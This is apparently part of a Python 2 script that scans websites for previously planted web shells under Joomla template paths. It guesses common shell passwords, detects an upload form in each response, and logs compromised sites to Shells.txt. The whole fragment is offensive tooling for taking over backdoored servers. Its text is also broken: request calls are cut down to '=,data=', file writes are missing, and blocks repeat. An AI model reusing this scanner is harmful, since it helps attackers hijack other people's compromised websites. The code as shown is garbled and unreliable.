if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH6_J_content = requests.get(SH6_J,timeout=15).content
if ' type="file"' in SH6_J_content or ' type=\'file\'' in SH6_J_content or ' type= "file"' in SH6_J_content or ' type= \'file\'' in SH6_J_content or ' type = "file"' in SH6_J_content or ' type = \'file\'' in SH6_J_content or ' type ="file"' in SH6_J_content or ' type =\'file\'' in SH6_J_content or ' type=file' in SH6_J_content or ' type =file' in SH6_J_content or ' type= file' in SH6_J_content or ' type = file' in SH6_J_content or 'Upload</a> ]</li><li>[' in SH6_J_content or 'upload</a><li><a>Sym' in SH6_J_content :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH6_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH7_J_content = requests.get(SH7_J,timeout=15).content
if ' type="file"' in SH7_J_content or ' type=\'file\'' in SH7_J_content or ' type= "file"' in SH7_J_content or ' type= \'file\'' in SH7_J_content or ' type = "file"' in SH7_J_content or ' type = \'file\'' in SH7_J_content or ' type ="file"' in SH7_J_content or ' type =\'file\'' in SH7_J_content or ' type=file' in SH7_J_content or ' type =file' in SH7_J_content or ' type= file' in SH7_J_content or ' type = file' in SH7_J_content or 'Upload</a> ]</li><li>[' in SH7_J_content or 'upload</a><li><a>Sym' in SH7_J_content :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH7_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH8_J_content = requests.get(SH8_J,timeout=15).content
if ' type="file"' in SH8_J_content or ' type=\'file\'' in SH8_J_content or ' type= "file"' in SH8_J_content or ' type= \'file\'' in SH8_J_content or ' type = "file"' in SH8_J_content or ' type = \'file\'' in SH8_J_content or ' type ="file"' in SH8_J_content or ' type =\'file\'' in SH8_J_content or ' type=file' in SH8_J_content or ' type =file' in SH8_J_content or ' type= file' in SH8_J_content or ' type = file' in SH8_J_content or 'Upload</a> ]</li><li>[' in SH8_J_content or 'upload</a><li><a>Sym' in SH8_J_content :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH8_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH9_J_content = requests.get(SH9_J,timeout=15).content
if ' type="file"' in SH9_J_content or ' type=\'file\'' in SH9_J_content or ' type= "file"' in SH9_J_content or ' type= \'file\'' in SH9_J_content or ' type = "file"' in SH9_J_content or ' type = \'file\'' in SH9_J_content or ' type ="file"' in SH9_J_content or ' type =\'file\'' in SH9_J_content or ' type=file' in SH9_J_content or ' type =file' in SH9_J_content or ' type= file' in SH9_J_content or ' type = file' in SH9_J_content or 'Upload</a> ]</li><li>[' in SH9_J_content or 'upload</a><li><a>Sym' in SH9_J_content :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH9_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
